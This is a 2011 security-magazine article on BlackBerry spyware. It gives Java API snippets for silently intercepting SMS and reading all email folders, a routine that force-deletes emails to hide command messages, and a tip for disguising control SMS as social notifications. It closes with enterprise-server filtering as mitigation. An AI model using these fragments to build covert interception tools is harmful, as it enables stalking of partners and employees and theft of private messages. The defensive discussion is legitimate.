ATTACK
The Backroom Message That’s Stolen Your Deal
Do you want to learn more about bigwig? Is someone
keeping secrets from you? Need to silently record text
messages, GPS locations and call info of your child or
employee? Catch everybody at whatever you like with our
unique service.
What you will learn…
• Each email or SMS message that is part of business correspondence can be intercepted
• A message can activate spyware
What you should know…
• Basic knowledge of BlackBerry security
It lets you intercept SMS or email messages via the Internet, catch cheating wives or cheating husbands, stop employee espionage, protect children, etc.
Well, you’ve just read yet another advertisement summarizing several spyware products for every mobile OS. Beyond any doubt, Windows Mobile, Symbian and iOS (iPhone) are the most popular with consumers, and none of them has ever had a distinct security policy. But BlackBerry devices are among the world’s top devices! It’s entirely explicable, though. One thing about them is defensible: they have a channel of proven security for transmitting data from one end to the other, and up to now there is no successful decoder for the encrypted traffic.
These days a lot of people use a mobile phone. It has made our lives easier and increased communication, but it also gives an opportunity for cheating. Suppose your lover isn’t being faithful to you and you want to confirm your suspicions or allay your fears. The main piece of evidence may be a new lover linked to your partner.
Telltale signs will be SMS messages to the same number, late at night or early in the morning or both; if the same number also appears as a call at unsocial hours, then you really have something to be concerned about. However, there can be a perfectly innocent explanation for activity like this, and it’s worth pausing before jumping to conclusions. If the number that is appearing is that of a family member or good friend, it might just be that your partner is planning a surprise for you and has enlisted their help, so check the number carefully, particularly if it seems familiar to you.
Nothing personal...
Everyone knows that reading other people’s letters or diaries without the permission of the author isn’t ethical. All personal correspondence, or even just information such as SMS messages, the address book, email and ICQ history, is covered by the fashionable word Privacy (or Private Data, Data Privacy). Any attempt to tamper with it behind the author’s back is a direct violation of individual privacy.
At one time or another, everyone has wondered what people write to each other, or what was written by a friend or colleague. It isn’t necessarily malicious intent. Do they have something to hide, are they hatching a plot? Omnivorous curiosity is one of the most popular human vices, and it helps fraudsters earn considerable sums of money every day. They are always ready to help anyone get into somebody else’s phone book, email messages or social networking pages. After all, can you get access to your cherished friend’s (lover’s, boss’s, foe’s) chats?
The victim’s mobile phone is the coveted goal. This storage place may shed light on things wrapped in mystery. There is no secret to reading others’ emails or SMS: you can take the phone and read everything you are interested in. It’s one of the easiest ways to do it.
04/2011
By the way, you may provoke your victim into allowing you to acquaint yourself with private data. It should be noted that lack of knowledge is one of the leading topics of the hour. Now the plot thickens into a vote of confidence! Really, how often does software ask you to grant it access to private data? Do you trust software with your secrets?
Take, for instance, some kind of program that modifies the SMS and email graphical controls. When you’re going to install it, you are asked to set access permissions (as general permission), send and receive permission, etc.
There is no reason for concern in this case, right? You install what you like despite the expectation of data stealing. If we take a Facebook application (or Twitter application), then the confidence level should be reduced, because such apps use HTTP/HTTPS over EDGE/3G/WiFi as their common channel for data transmission. Furthermore, they are able to receive up-to-date information about new friends or upload a status by sending SMS.
For some time now, the Internet has been spreading spam offering a service to read others’ posts. Kaspersky Lab reported one of these viruses in February 2009. Users were promised the ability to read others’ SMS. By clicking on the junk link, users downloaded a Trojan called Trojan.Win32.Agent2.dbq (Kaspersky Lab’s notation).
The next secret (cherished) zone is personal email storage. Email correspondence goes astray no less than SMS. Deceivers offer email account password-breaking services. At first they ask for an upfront payment via SMS and never break into the account. There is another kind of deception. Someone spreads news about security holes in the Google or Yahoo email systems and offers to get the password from any mailbox. All you need to do is send your (!) password and the answer to your secret question (what’s your favourite colour?) to the email address referred to above. This supposedly works by cheating the email system (Google, Yahoo), and afterwards you will supposedly receive a list of passwords for any email system. Come again! It’s a simple substitution of your account’s password for the desired password. So, there’s no fraud! Really, there are a lot of security holes (but this is just one kind of them); really, there is a way to steal a password. Are you ready to name this hole? Nobody but you! The email address in the received message is just the intruder’s email account. This way he gets others’ passwords. Also, he doesn’t want anyone to confide in.
Thus, all proposals for access to others’ correspondence have two goals: trick the user out of money or infect the user’s computer with a virus. In this case the attacker could also capture the user’s own password.
www.hakin9.org/en
Routines behind the screen...
Message (SMS or email) interception is a great opportunity to take control of somebody and remain invisible. You’re able to read emails as well as build a telephone directory (subscriber list) from the text messages, up to the minute. This kind of message interception is in demand depending on the situation. Moreover, it’s a real chance to feel like a spy and obtain information that can’t be got in a legal way. Some years ago such interception was science fiction, available only to intelligence services. Today you don’t need to be a secret serviceman; you don’t need a high level of experience. The explanation is quite simple: you only need to hit with your legacy hammer. There’s no way to misapply a hammer, is there? You can hammer a nail into a board, or you can hammer a nail into somebody’s head. There is nothing reprehensible about the tool itself. Public tranquillity as protectability is the wrong side of vulnerability, and vice versa.
Malware Design
The ultimate goal is to show which API routines help us design such malware. The list of API classes that must be imported to recreate an SMS listener is presented in Listing 1.
Listing 1. API-routines to design malware's part “sms intercept”
import java.util.Date;
import javax.microedition.io.Connector;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.Message;
import javax.wireless.messaging.TextMessage;
import javax.wireless.messaging.BinaryMessage;
Listing 2. Retrieve the message
// open a server-mode SMS connection; receive() blocks until a message arrives
MessageConnection sms_connection = (MessageConnection) Connector.open("sms://:0");
Message sms_message = sms_connection.receive();
Date sms_date = sms_message.getTimestamp();
String sms_address = sms_message.getAddress();
String sms_body = null;
if (sms_message instanceof TextMessage)
{
    TextMessage temp_text = (TextMessage) sms_message;
    sms_body = temp_text.getPayloadText();
}
else if (sms_message instanceof BinaryMessage)
{
    byte[] temp_byte = ((BinaryMessage) sms_message).getPayloadData();
    // convert binary data to text
    sms_body = new String(temp_byte, "UTF-8");
}
The first public class, Date, represents a specific instant in time, with millisecond precision.
The Message interface is the base interface for derived interfaces that represent various types of messages. This interface contains the functionality common to all messages. We have a couple of routines here:
• getAddress() – Returns the address associated with this message. If this is a message to be sent, then this address is the recipient’s address. If this is a message that has been received, then this address is the sender’s address.
• getTimestamp() – Returns the timestamp indicating when this message has been sent.
The MessageConnection interface defines the basic functionality for sending and receiving messages. The receive() method receives a message; if there are no messages waiting for this MessageConnection, it blocks until either a message for this connection is received or the MessageConnection is closed.
When an incoming message arrives, the notifyIncomingMessage(MessageConnection) method is called. There is an equivalent method for outgoing messages, notifyOutgoingMessage(MessageConnection), which is called when an SMS message is sent from the device. Both methods are called once for each message on the MessageConnection.
The second malware part is designed to catch email messages. In this case a different signed routine set should be used, which is described in Listing 3.
Listing 3. API-routines to design malware's part “email intercept”
import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;
Folder INTEGER Constants
• DELETED – A Folder containing deleted messages.
• DRAFT – A Folder containing draft messages.
• FILED – Contains items that are filed in a Folder.
• INBOX – A Folder containing received messages.
• INVALID – A Folder containing items marked as invalid.
• JUNK – A Folder for junk mail.
• OTHER – A Folder that the user created – a personal folder.
• OUTBOX – A Folder containing messages in the process of being sent.
• SENT – A Folder containing sent messages.
• UNFILED – Contains items that are not currently filed in a Folder.
Listing 4. Retrieve an email message
Session current_session = Session.getDefaultInstance();
String folders_name = null;
String email_from = null;
String email_subject = null;
String email_body = null;
if (current_session != null)
{
    Store current_storage = current_session.getStore();
    Folder[] list = current_storage.list();
    for (int i = 0; i < list.length; i++)
    {
        folders_name = list[i].getFullName(); // get folder's name
        Message[] msgs = list[i].getMessages();
        for (int n = 0; n < msgs.length; n++)
        {
            Address from = msgs[n].getFrom();
            if (from != null)
            {
                email_from = from.getAddr();
            }
            email_subject = msgs[n].getSubject();
            email_body = msgs[n].getBodyText();
        }
    }
}
The Session class provides access to email services, storage, and transport.
The Message class represents an email message. A message contains a set of header fields (attributes) and a body (contents). Messages in a folder also have a set of flags that describe their state within the folder. Received messages are retrieved from the folder named INBOX (see the Folder integer constants).
The Folder class represents a mailbox folder on the handheld. To retrieve a list of contained folders, just call Folder.list(). But we don’t need anything about the folders’ contents or the system folders’ names; if we need to extract a folder’s name, the routine to call is getFullName(). By the way, it’s simple to use a loop for (int i = 0; i < email_folder_list.length; i++), because we’ve already got the email folder list by calling Folder.list().
The Store class represents a message store and its access protocol, for storing and retrieving messages on the handheld. To retrieve a Store instance to access message storage on this device we need to invoke Session.getStore().
Referring to the code above, I notice that I overwrite four String objects: folders_name, email_from, email_subject, email_body. For data acquisition you should use a Vector object like Vector data_acq = new Vector() from java.util.Vector, and then create a String object by converting the data with Utils.makeStringFromVector. By the way, you can also use a StringBuilder.
Stolen messages from blackberry device
Sender :: InternetSMS
Body :: http://www.blackberryseeker.com/applications/download/PDF-To-Go-V20_2.aspx
Sender :: InternetSMS
Body :: http://letitbit.net/download/.../Defcon14-V64-X30n-Blackjacking_Owning_the_enterprise.m4v.html
Puppet theatre
Progress is interesting to watch. It happens in every area of human activity, otherwise the area vanishes from sight. Cybercrime is no exception. It rapidly improves what its own inhabitants use. Malware 2.0 has been a new word in the IT security vocabulary since 2006. This term describes the new generation of malicious software, because it is a well-coordinated and well-functioning system. By the way, it poisons the existence of anti-viruses.
Trojans are malicious programs that perform actions which are not authorized by the user: they delete, block, modify or copy data, and they disrupt the performance of computers or computer networks. Unlike viruses and worms, the threats that fall into this category are unable to make copies of themselves or self-replicate. Trojans are classified according to the type of action they perform on an infected computer. This subclass includes the following behaviours according to Kaspersky Lab:
• Backdoor
• Exploit
• Rootkit
• Trojan-DDoS
• Trojan-Downloader
• Trojan-Proxy
• Trojan-SMS
• Trojan-Spy, etc.
Figure 1. Application Management
The most interesting subclasses are Backdoor and Trojan-DDoS. The second subclass will be attended to later in the article. Now we discuss a backdoor’s behaviour. Backdoors are designed to give malicious users remote control over an infected computer, so they are similar to many administration systems designed and distributed by software developers. These types of malicious programs make it possible to do anything the intruder wants on the infected handheld: send and receive files, launch files or delete them, display messages, delete data, etc. The programs in this category are often used to unite a group of victim computers and form a botnet or zombie network. This gives malicious users centralized control over an army of infected computers which can then be used for criminal purposes.
Listing 5. Delete an email message
import net.rim.blackberry.api.mail.Folder;
…
Message[] emailMessage = emailFolder.getMessages();
for (int i = 0; i < emailMessage.length; i++)
{
    // true forces deletion even if the message is marked as saved
    emailFolder.deleteMessage(emailMessage[i], true);
}
Figure 2. Set application’s permission
Unfortunately, the RIM API does not allow access to already received/sent SMS messages. In spite of this, it is still possible to mask our control command as some kind of spam, e.g. +323232 User MegaFriend has sent message to you. Isn’t it a Facebook notification? It doesn’t matter much that such an SMS has a different sender number; what matters is that your device has received a control message.
Figure 3. Firewall Management
The most popular message control channel is SMS (or MMS). The advantages of SMS are rapid access, steadiness and assured reliability. In BlackBerry’s case, email is a second sufficient channel, capable of the same rapidly moving events. I discussed above how to catch SMS or email messages. So, if we’re going to create a powerful command and control system (CC from here on), we need to know how to delete this message. Part of the code to delete all the email is shown in Listing 5.
The boolean value in .deleteMessage(..., true) indicates forced deletion if the message is marked as saved. If you’ve just caught an email message with
synchronized void messagesAdded(FolderEvent event) { Message msg = event.getMessage(); }
where the event is FolderEvent(Folder folder, int type, Message message), then you can delete it with msg.deleteMessage(...).
Figure 4. Exception’s of black list
Mitigation
BlackBerry Enterprise Server has several means of mitigation. First, you can turn on confirmation of each sent message, for cases where a BlackBerry Trojan is able to spend money and you have to pay the bill. This rule is placed in IT Policy>Common Policy Group>Confirm On Send. Even if you set it to True, this rule affects only the user’s actions. In other words, no program will ever notify you when it sends a message. You can also set trusted applications in Application Control>Message Access. One more radical solution consists in disabling SMS and MMS via IT Policy>Device Only Items>Allow SMS and IT Policy>Common>Disable MMS. The first should be set to False, and the second to True.
A more powerful way is to create a trusted domain. This ability lets us fill a white list with trusted senders and recipients and filter by a black list of phrases, senders and recipients. First of all, you should check and turn on your BES filter’s status: IT Policy>Security>Firewall Block Incoming Messages. Here SMS, MMS and Enterprise Message should be checked as filtered types. Enterprise Message is nothing other than enterprise email messages. After that, fill a white list in IT Policy>Security>Firewall White List Address with e.g. *@blackberry.enterprise.com. Take notice of the use of substitution characters like the asterisk “*”. You can also add other values separated with commas. The first step is done: you’ve just created a trusted domain filled only with white addresses.
Figure 5. Adding new exception
On the ‘Net
• http://docs.blackberry.com/en/admin/deliverables/12063/BlackBerry_Enterprise_Server-Policy_Reference_Guide-T323212-8320261023123101-001-5.0.1-US.pdf – BlackBerry Enterprise Server Version 5.0, Policy Reference Guide, RIM
• http://docs.blackberry.com/en/developers/deliverables/11961/BlackBerry_Java_Application-Feature_and_Technical_Overview-789336-1109112514-001-5.0_Beta-US.pdf – BlackBerry Java Application Version 5.0, Feature and Technical Overview, RIM
• http://docs.blackberry.com/en/developers/deliverables/9091/JDE_5.0_FundamentalsGuide_Beta.pdf – BlackBerry Java Application Version 5.0, Fundamentals Guide, RIM
• http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_Application_Developer_Guide_Volume_1.pdf?nodeid=1106256&vernum=0 – BlackBerry Application Developer Guide Volume 1: Fundamentals (4.1), RIM
• http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1106255/BlackBerry_Application_Developer_Guide_Volume_2.pdf?nodeid=1106444&vernum=0 – BlackBerry Application Developer Guide Volume 2: Advanced Topics (4.1), RIM
• http://www.blackberry.com/developers/docs/4.2api/ – RIM Device Java Library 4.2.0 Release (Javadoc), RIM
• http://docs.blackberry.com/en/developers/deliverables/15497/BlackBerry_Smartphone_Simulator-Development_Guide--10019260406042642-001-5.0-US.pdf – BlackBerry Smartphone Simulator Version 5.0, Development Guide, RIM
• http://docs.blackberry.com/en/developers/deliverables/1077/BlackBerry_Signing_Authority_Tool_1.0_-_Password_Based_-_Administrator_Guide.pdf – BlackBerry Signature Tool 1.0, Developer Guide, RIM
The second step is filling in black tags. First of all, you should turn this option on too. The rule IT Policy>Filter Rule>Condition and Action>Enabled, set to True, switches on straining of your emails. The second rule, IT Policy>Filter Rule>Condition and Action>From, gives the opportunity to vanish messages from unknown senders. Here you can type something like [email protected], [email protected]. The same rule IT Policy>Filter Rule>Condition and Action>Sent To can filter vulnerable messages that may carry stolen data to an intruder’s account or a non-trusted account. To control transferred subjects and bodies, set unallowable phrases in the following rules: IT Policy>Filter Rule>Condition and Action>Subject and IT Policy>Filter Rule>Condition and Action>Body. After that, you have to check the last rule, which indicates the way black messages are delivered. In the first case the device receives only headers; in the second case BES holds such messages and doesn’t allow the device to download them.
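As an added illustration (not the article’s or RIM’s code) of how the white list and filter rules described above combine, here is a small Python model of that policy evaluation; the Firewall and FilterRule classes, the evaluation order (firewall white list first, then filter rule) and the sample messages are assumptions made for this example, and the article’s spoofed “MegaFriend” SMS is among the samples:

```python
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import Dict, List
# Added example, not RIM code: evaluation order and sample data are assumptions.

def parse_policy_list(value: str) -> List[str]:
    """Split a comma-separated IT Policy value, e.g. '*@a.example, *@b.example'."""
    return [v.strip().lower() for v in value.split(",") if v.strip()]

def matches_any(text: str, patterns: List[str]) -> bool:
    """Case-insensitive match; '*' is the substitution character the article shows."""
    return any(fnmatchcase(text.lower(), p) for p in patterns)

@dataclass
class Firewall:
    """IT Policy>Security>Firewall Block Incoming Messages + Firewall White List Address."""
    block_incoming: bool = True
    filtered_types: List[str] = field(default_factory=lambda: ["sms", "mms", "enterprise"])
    white_list: List[str] = field(default_factory=list)

@dataclass
class FilterRule:
    """IT Policy>Filter Rule>Condition and Action (Enabled, From, Sent To, Subject, Body)."""
    enabled: bool = True
    from_addrs: List[str] = field(default_factory=list)
    sent_to: List[str] = field(default_factory=list)
    subject_phrases: List[str] = field(default_factory=list)
    body_phrases: List[str] = field(default_factory=list)
    headers_only: bool = True  # True: device gets headers only; False: BES holds the message

def evaluate(msg: Dict[str, str], fw: Firewall, rule: FilterRule) -> str:
    """Return what BES would do with one message under this policy."""
    sender, recipients = msg["from"], parse_policy_list(msg["to"])
    # Step 1: incoming messages of a filtered type are dropped unless the sender
    # belongs to the trusted domain (white list).
    if (msg["direction"] == "in" and fw.block_incoming
            and msg["type"] in fw.filtered_types
            and not matches_any(sender, fw.white_list)):
        return "blocked-by-firewall"
    # Step 2: the filter rule blacklists senders, recipients and phrases.
    if rule.enabled and (
            matches_any(sender, rule.from_addrs)
            or any(matches_any(r, rule.sent_to) for r in recipients)
            or any(p in msg["subject"].lower() for p in rule.subject_phrases)
            or any(p in msg["body"].lower() for p in rule.body_phrases)):
        return "headers-only" if rule.headers_only else "held-on-bes"
    return "delivered"

def message(direction: str, mtype: str, sender: str, to: str,
            subject: str = "", body: str = "") -> Dict[str, str]:
    return {"direction": direction, "type": mtype, "from": sender,
            "to": to, "subject": subject, "body": body}

def run_samples() -> Dict[str, str]:
    """Evaluate constructed sample messages against a constructed policy."""
    fw = Firewall(white_list=parse_policy_list("*@blackberry.enterprise.com"))
    rule = FilterRule(from_addrs=parse_policy_list("spammer@example.org"),
                      sent_to=parse_policy_list("*@untrusted-placeholder.example"),
                      subject_phrases=["password"], body_phrases=["wire transfer"],
                      headers_only=False)
    samples = {
        "internal-mail": message("in", "enterprise", "boss@blackberry.enterprise.com",
                                 "me@blackberry.enterprise.com", "Q2 deal", "see attached"),
        # the spoofed "friend notification" SMS the article shows as a control message
        "spoofed-notify-sms": message("in", "sms", "+323232", "+15550100",
                                      body="User MegaFriend has sent message to you"),
        # outgoing mail addressed to an account outside the trusted domain
        "mail-to-untrusted": message("out", "enterprise", "me@blackberry.enterprise.com",
                                     "x@untrusted-placeholder.example", "fwd", "contacts"),
        "phrase-in-subject": message("in", "enterprise", "it@blackberry.enterprise.com",
                                     "me@blackberry.enterprise.com", "Your PASSWORD expires"),
    }
    return {name: evaluate(m, fw, rule) for name, m in samples.items()}
```

Running run_samples() shows the firewall stopping the spoofed SMS before the filter rule is even consulted, while a white-listed internal sender can still be held by a Subject phrase.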
If you are a BIS consumer, you should always check permissions when downloading an application, to grant or disallow its access to email or SMS. Or you can set it after you have downloaded the application in Options>Device>Application Management>Edit Permissions. To fill a white list while enabling the device firewall you should follow Options>Security>Firewall, check the desired features and add a white rule.
Conclusion
Spyware is one of the most common types of malware. While the term spyware suggests software that secretly monitors the user’s computing, the functions of spyware extend well beyond simple monitoring. It’s designed to spy on what you’re doing on your device. It collects information about the web pages you usually visit, your Internet surfing habits and the messages you exchange. It also interferes with user control of the computer in other ways, such as installing additional software, redirecting web browser activity or stealing personal information (including financial information such as credit card numbers). Then it sends all this to others without your knowledge. However, to get installed it has to hide itself, for example in demo games. The presence of spyware is typically hidden from the user and can be difficult to detect. It’s not very common; it isn’t the mass of viruses, Trojans and backdoors that antiviruses can stop, otherwise everybody would know about it. Like many recent viruses, however, spyware by design exploits infected computers for commercial gain.
Even if you think your information isn’t important to an intruder, they can use your device’s resources against others or steal data without ever letting you know about it. By the way, they cover their tracks and leave your device (and you) holding the baby.
YURY CHEMERKIN
Graduated from Russian State University for the Humanities (http://rggu.com/) in 2010. At present a postgraduate at RSUH. Information Security Analyst since 2009; currently works as a mobile info security researcher in Moscow.
E-mail: [email protected]
Facebook: http://www.facebook.com/people/Yury-Chemerkin/100001827345335
LinkedIn: http://ru.linkedin.com/pub/yury-chemerkin/2a/434/549